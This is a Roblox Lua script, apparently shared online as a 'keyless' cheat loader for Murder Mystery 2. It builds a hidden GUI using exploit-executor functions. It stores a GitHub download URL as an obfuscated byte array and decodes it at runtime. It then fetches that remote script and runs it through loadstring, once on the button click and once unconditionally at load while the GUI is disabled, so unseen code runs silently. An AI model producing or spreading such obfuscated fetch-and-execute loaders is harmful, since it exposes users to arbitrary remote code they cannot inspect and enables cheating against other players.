local TweenService = game:GetService("TweenService")
local CoreGui = game:GetService("CoreGui")
local function _d(b)
local s = {}
for i=1, #b do table.insert(s, string.char(b[i])) end
return table.concat(s)
end
local gui = Instance.new("ScreenGui")
gui.Name = "ultrahub"
gui.ResetOnSpawn = false
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
if gethui then
gui.Parent = gethui()
elseif syn and syn.protect_gui then
syn.protect_gui(gui)
gui.Parent = CoreGui
else
gui.Parent = CoreGui
end
local main = Instance.new("Frame")
main.Name = "Main"
main.Parent = gui
main.AnchorPoint = Vector2.new(0.5, 0.5)
main.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
main.BorderSizePixel = 0
main.Position = UDim2.new(0.5, 0, 0.5, 0)
main.Size = UDim2.new(0, 350, 0, 200)
local mainCorner = Instance.new("UICorner")
mainCorner.CornerRadius = UDim.new(0, 8)
mainCorner.Parent = main
local mainStroke = Instance.new("UIStroke")
mainStroke.Color = Color3.fromRGB(60, 60, 60)
mainStroke.Thickness = 1
mainStroke.Parent = main
local title = Instance.new("TextLabel")
title.Name = "Title"
title.Parent = main
title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1.000
title.Position = UDim2.new(0, 0, 0.1, 0)
title.Size = UDim2.new(1, 0, 0, 30)
title.Font = Enum.Font.GothamBold
title.Text = "MM2 keyless"
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextSize = 24.000
local subtitle = Instance.new("TextLabel")
subtitle.Name = "Subtitle"
subtitle.Parent = main
subtitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
subtitle.BackgroundTransparency = 1.000
subtitle.Position = UDim2.new(0, 0, 0.25, 0)
subtitle.Size = UDim2.new(1, 0, 0, 20)
subtitle.Font = Enum.Font.Gotham
subtitle.Text = "Murder Mystery 2"
subtitle.TextColor3 = Color3.fromRGB(150, 150, 150)
subtitle.TextSize = 14.000
local btn = Instance.new("TextButton")
btn.Name = "LoadBtn"
btn.Parent = main
btn.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
btn.AnchorPoint = Vector2.new(0.5, 1)
btn.Position = UDim2.new(0.5, 0, 0.85, 0)
btn.Size = UDim2.new(0, 280, 0, 45)
btn.Font = Enum.Font.GothamBold
btn.Text = "OPEN MM2"
btn.TextColor3 = Color3.fromRGB(255, 255, 255)
btn.TextSize = 16.000
btn.AutoButtonColor = false
local btnCorner = Instance.new("UICorner")
btnCorner.CornerRadius = UDim.new(0, 6)
btnCorner.Parent = btn
local btnStroke = Instance.new("UIStroke")
btnStroke.Color = Color3.fromRGB(80, 80, 80)
btnStroke.Thickness = 1
btnStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
btnStroke.Parent = btn
btn.MouseEnter:Connect(function()
TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(50, 50, 50)}):Play()
TweenService:Create(btnStroke, TweenInfo.new(0.2), {Color = Color3.fromRGB(100, 100, 255)}):Play()
end)
btn.MouseLeave:Connect(function()
TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(40, 40, 40)}):Play()
TweenService:Create(btnStroke, TweenInfo.new(0.2), {Color = Color3.fromRGB(80, 80, 80)}):Play()
end)
local _b = {
104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104, 117, 98, 117, 115,
101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 106, 97, 122, 122, 101, 100,
100, 47, 74, 97, 114, 97, 100, 122, 83, 99, 114, 105, 112, 116, 115, 47, 114, 101, 102, 115,
47, 104, 101, 97, 100, 115, 47, 109, 97, 105, 110, 47, 83, 99, 114, 105, 112, 116
}
btn.MouseButton1Click:Connect(function()
btn.Text = "RUNNING"
btn.TextColor3 = Color3.fromRGB(100, 255, 100)
local info = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out)
TweenService:Create(main, info, {BackgroundTransparency = 1}):Play()
TweenService:Create(mainStroke, info, {Transparency = 1}):Play()
TweenService:Create(title, info, {TextTransparency = 1}):Play()
TweenService:Create(subtitle, info, {TextTransparency = 1}):Play()
TweenService:Create(btn, info, {BackgroundTransparency = 1, TextTransparency = 1}):Play()
TweenService:Create(btnStroke, info, {Transparency = 1}):Play()
task.delay(0.6, function()
gui:Destroy()
end)
task.spawn(function()
loadstring(game:HttpGet(_d(_b)))()
end)
end)
gui.Enabled = false
task.spawn(function()
loadstring(game:HttpGet(_d(_b)))()
end)
Comments
No comments yet
Be the first to share your thoughts!